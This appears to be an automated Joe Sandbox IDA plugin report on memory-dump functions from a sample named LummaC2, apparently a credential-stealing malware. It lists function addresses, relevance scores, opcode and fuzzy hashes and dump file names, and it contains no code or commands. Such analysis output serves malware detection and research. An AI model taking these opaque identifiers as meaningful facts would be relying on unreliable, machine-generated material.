Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: a4715ddb1ffc7b20da870b2b5c2e760865f66fc30e59ff2aded231e420a1917a
Instruction ID: 6f91cb9ae238befe426bcd4d0febdf6a96edcc149a217873d313ea892c2f7353
Opcode Fuzzy Hash: a4715ddb1ffc7b20da870b2b5c2e760865f66fc30e59ff2aded231e420a1917a
Instruction Fuzzy Hash: 1861EB5561529006CB2DDF7484B373B7AE69F44308F2892EEC965CFAD7E638C5038786

Function 002FB813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 002FB9E3

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 8f6e642ddf84267eb50d3c4dab6217f51a4e1a7dd759dc8805ebfc55cd292645
Instruction ID: 4eb3f24eaa5577c8e0501b713b344a65ac5dba32310ff621ed49ccbb511d5923
Opcode Fuzzy Hash: 8f6e642ddf84267eb50d3c4dab6217f51a4e1a7dd759dc8805ebfc55cd292645
Instruction Fuzzy Hash: 47518C71621A158BCB1ECF38CD6153ABBE6FB56304318497DC592DB3A2EB359812CF10

Function 002DAAE0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

2w-, xrefs: 002DAAF0

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2w-
API String ID: 0-4245642152
Opcode ID: 09bc9cb8980e4cbef3a45eced2bdce7b42db90b0464941163e08c9f68a744563
Instruction ID: 5d555a984ec32375f69e5659628805abfa5c85d12225ae4c9231e328a3fa3f87
Opcode Fuzzy Hash: 09bc9cb8980e4cbef3a45eced2bdce7b42db90b0464941163e08c9f68a744563
Instruction Fuzzy Hash: BC51463377A9914BD7298A3C4C217A66A830BE3334F2DC76BD4B2873E4E5A54C129342

Function 002FE8D0 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

@, xrefs: 002FE9AB

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: dabf3bf5db724d3500e9e2752461805c33c61c8d65bb503bed65625d085d2fa8
Instruction ID: 26169ba474f64d8f29782c2894da5bbae47e4bce5c9b9c919620e382052d1c6d
Opcode Fuzzy Hash: dabf3bf5db724d3500e9e2752461805c33c61c8d65bb503bed65625d085d2fa8
Instruction Fuzzy Hash: BE4141B16153019BDB15CF14CC91B7BB7A2FFC8344F09892CE6C54B2A0E770A920CB92

Function 002FDAA0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

@, xrefs: 002FDAF0

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: e7b8f3d45db7149418d95bb1fc8b486a8c988e8b88745c3d17677630efd1e530
Instruction ID: 00e1856c490632903b211b46f527e40b61f3eb1bc06c61b1f0ffab8b62386e19
Opcode Fuzzy Hash: e7b8f3d45db7149418d95bb1fc8b486a8c988e8b88745c3d17677630efd1e530
Instruction Fuzzy Hash: 5221BFB11193099FD311DF18D88066AF7FAFBC9368F15892CE6C987250D731A915CB52

Function 002E8290 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

$, xrefs: 002E8360

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 41abd0841593804b0be2370dde897b56503927c7134529257cca6ae9096c0676
Instruction ID: e46e23d2ef1ae0d9ea6d365f7b654b598081a727af85a562a9df6e1dfbecb65a
Opcode Fuzzy Hash: 41abd0841593804b0be2370dde897b56503927c7134529257cca6ae9096c0676
Instruction Fuzzy Hash: EE21783269C3505BE314CF659CC1B5BB7F6DBD1700F0AC82DA4D99B2C6C9B8C80A8752

Function 002FBC14 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

, xrefs: 002FBC25, 002FBC55, 002FBC71

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: 240b86b42df3ef908732259a22c463328dd6070237ee34d2b47d8bfd04e82f2e
Instruction ID: 02a3a32d62734f002c892c8f1f358e4ab4ab3be51e2d70a05fa82740eb3eb122
Opcode Fuzzy Hash: 240b86b42df3ef908732259a22c463328dd6070237ee34d2b47d8bfd04e82f2e
Instruction Fuzzy Hash: 35F06820A255594FEBE18F7C94693BF67F0E716314F202DB9C64EE32D1DD1498814B08

Function 002FD140 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d188fd07266a7840e72e69e8a020420bdff28dd09b7629056b66e891f0ad0c07
Instruction ID: 8e21f6a2a975781900ebbf5e48db7c0c9ae99de8aea49a97dcab6b06cc0535b5
Opcode Fuzzy Hash: d188fd07266a7840e72e69e8a020420bdff28dd09b7629056b66e891f0ad0c07
Instruction Fuzzy Hash: E6220431B19215CFC714CF28D8A066AB3E6FF8A314F1A85BED98587361D731AC56CB80

Function 002FD240 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9ec780594f21377f8feec08dce78bf1a1c1f2089aaf7e2dbacdba987711f00
Instruction ID: caafc7f83b7990d2e5c0274091326830cb744508f2b8c47ae3f3309f2b52e9b6
Opcode Fuzzy Hash: 5a9ec780594f21377f8feec08dce78bf1a1c1f2089aaf7e2dbacdba987711f00
Instruction Fuzzy Hash: 4712F231B19211CFC718CF28D8A066AB7E6FFCA314F1A85BED58587361D631AC56CB80

Function 002C2F40 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f883af0d24942f83c205bd87514817997cd5dfb92fa0f7961ed11aa2085b1c4
Instruction ID: 31eae7018dd8628729a856d59b5319aa26c21a7c1f8b6ffd77b2471007089c1c
Opcode Fuzzy Hash: 8f883af0d24942f83c205bd87514817997cd5dfb92fa0f7961ed11aa2085b1c4
Instruction Fuzzy Hash: 9D52CF715183468FCB19CF18C090BEABBE1BF88314F18CA6DE89A57341D775EA59CB81

Function 002C6660 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17963d8db210539ed43b3571890e66ab81fe250206aa5a93c6f52e7e235c1744
Instruction ID: 2b0bbab9d4a492e92fe70c7656969a51360aed939aafc47d33aca3ef37bfe39f
Opcode Fuzzy Hash: 17963d8db210539ed43b3571890e66ab81fe250206aa5a93c6f52e7e235c1744
Instruction Fuzzy Hash: 5252F5B0918B858FE735CF24C488BA7BBE1EF51314F148A2DD5E706A83C379A9A5C741

Function 002C7440 Relevance: .7, Instructions: 664COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction ID: f0f4c3f25c24deed2b2bded40acf41130602de9cc032eddc61a897d6bb858eb2
Opcode Fuzzy Hash: 4e5480c954f944f2d77b15b2a4e6c9b00cb7734c87ff60cc96a3044481aca68b
Instruction Fuzzy Hash: D822C43161C7168BC724DF18D840BABB3E5FFD4319F298A2DD9C697281D774A825CB82

Function 002FD320 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89566c7cfb0a36c27fa8ff1036d15613fdc52fce6d3bd64751f7614eadb2c921
Instruction ID: 3fa63f845b6fd6bb42f8027bea780094404e3bb22a5b6cf8cc54be0073aab4b0
Opcode Fuzzy Hash: 89566c7cfb0a36c27fa8ff1036d15613fdc52fce6d3bd64751f7614eadb2c921
Instruction Fuzzy Hash: E202E132B19211CFC718CF28D8A066AB3E6FFCA314F1A85BED58587361D631AD55CB80

Function 002C3960 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97ce45e367fd42e1d3529f63c3857dd43e88a798e5177c9127507ccaa136d24
Instruction ID: 0bd093e5b7a6fe3ce060e2c5ce3782594b13d304ef9b73fc9c14e44baad19ca7
Opcode Fuzzy Hash: a97ce45e367fd42e1d3529f63c3857dd43e88a798e5177c9127507ccaa136d24
Instruction Fuzzy Hash: 66321270924B118FC368CF29C590A6ABBF1BF45710B608E2ED6A787E90D776F954CB10

Function 002FD3B0 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66f3dc903860891b43e5db21aebfc6dc305a25cecbe28309eee74f0f3d3763d4
Instruction ID: a4899c97a8463246375ab33ba8a947efb6d26d55eb4c04538656b5249b00248d
Opcode Fuzzy Hash: 66f3dc903860891b43e5db21aebfc6dc305a25cecbe28309eee74f0f3d3763d4
Instruction Fuzzy Hash: 1AF1E332A19215CFC718CF28D8A066AB7E6FFCA314F1A85BED98597351D631AD11CB80

Function 002FD450 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f1f929ed1eb7a7cbd8336dca35f2337e990b9c371ae19e7826cd3bde588623
Instruction ID: 6777477827331c6d8c4c87843cf2ee69c5d539931ec966ff6a5a7d92549f9a75
Opcode Fuzzy Hash: 37f1f929ed1eb7a7cbd8336dca35f2337e990b9c371ae19e7826cd3bde588623
Instruction Fuzzy Hash: 36F11832B19215CFC718CF28D8A066AB7E2FFCA314F1A85BDD88597351D631AD12CB91

Function 002F7790 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db44903a1a27ffb212fd7e03f80dccbcba61d5c2cfad177472d25114eef23bd
Instruction ID: 3858a9eb8713ec7a06bef74edd52e5491d4099fb258e1c7d5a509152644bfe4a
Opcode Fuzzy Hash: 5db44903a1a27ffb212fd7e03f80dccbcba61d5c2cfad177472d25114eef23bd
Instruction Fuzzy Hash: F9E17632A183198BD314CF24C891A7BF7A2FBC5348F19893DE68597254DB31EC16CB81

Function 002ED110 Relevance: .5, Instructions: 480COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1ee2e0cf8f9564c91f4fe96bf148bb6cbb62b3a147275fb1d6f2fb7a6383f6
Instruction ID: 7c605649826ba90b1d5a528433d0e259a69992ae33f01da0a29731d41eb60526
Opcode Fuzzy Hash: 2b1ee2e0cf8f9564c91f4fe96bf148bb6cbb62b3a147275fb1d6f2fb7a6383f6
Instruction Fuzzy Hash: 8D2202F4612B009FC3AACF29C866B97BBE9EB89714F50481EE0AE87354C77165018F95

Function 002E20C0 Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74b3acf92cbc24ee239c7977afbbe62491f11be551ebd167a8f0d20ea677e3b
Instruction ID: 90008c326dd8653b43ac6206f51280773c7212f11a61204078b2df4d3cf251e1
Opcode Fuzzy Hash: f74b3acf92cbc24ee239c7977afbbe62491f11be551ebd167a8f0d20ea677e3b
Instruction Fuzzy Hash: D6A16A71668351DBDB10DF25C89263BB3E9EF91314F48892CE8CA97282E374DD19C762

Function 002C5970 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction ID: f28a1796ef82f010215ce3e63f986f97745f9f455cfe73ce2817e70c7e133ddf
Opcode Fuzzy Hash: 6aba2e7236a2e9aceeb2528f5b0b9aaecc5cc82245fb39869df27382fd64ba8a
Instruction Fuzzy Hash: 15E16871108781CFC724DF29C880B6BBBE5EF99300F448A2DE4D587752E675E998CB92

Function 002E6230 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d7c58e7188249116e5d062c4ab8f94150d3eb393eca69a0e7dc87f42629eb66
Instruction ID: 19b1bb93addff628390b5cb9f6a9ee6b97508a5c6d730acc2e37d1a404531aaf
Opcode Fuzzy Hash: 4d7c58e7188249116e5d062c4ab8f94150d3eb393eca69a0e7dc87f42629eb66
Instruction Fuzzy Hash: 26B1F0B1AA83824BDB24CF25C84663BB3E1EFE5344F88893CE88647381D235DC15C792

Function 002E1D10 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2778b409aa61e9008096bae252f0387e76fd098dab04225349f2ff99001ba786
Instruction ID: b693009488e57d505c313299201831e4832db20792b9092dbf0e06e30102e59b
Opcode Fuzzy Hash: 2778b409aa61e9008096bae252f0387e76fd098dab04225349f2ff99001ba786
Instruction Fuzzy Hash: E7A127B16543418BD7249F25CC92B6BB3E5EFD0364F18852CF9898B381E774D825CB92

Function 002DD840 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2950072845.00000000002C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000001.00000002.2950051980.00000000002C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950102035.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950115560.0000000000303000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950128231.0000000000307000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2950140761.0000000000311000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8be230417cc33073a84dd12cfa6aed575f7b79681421e833d2ad82c6156d075
Instruction ID: 368cb0111506d01dc09927c80f14cc212dbf56428b61ba7b727d6c8956aa7184
Opcode Fuzzy Hash: b8be230417cc33073a84dd12cfa6aed575f7b79681421e833d2ad82c6156d075
Instruction Fuzzy Hash: 62B12875928302AFD7109F24CC51B2ABBE2BFD4358F158A2EF494933A0D772AC25DB41

Function 002FE1F0 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

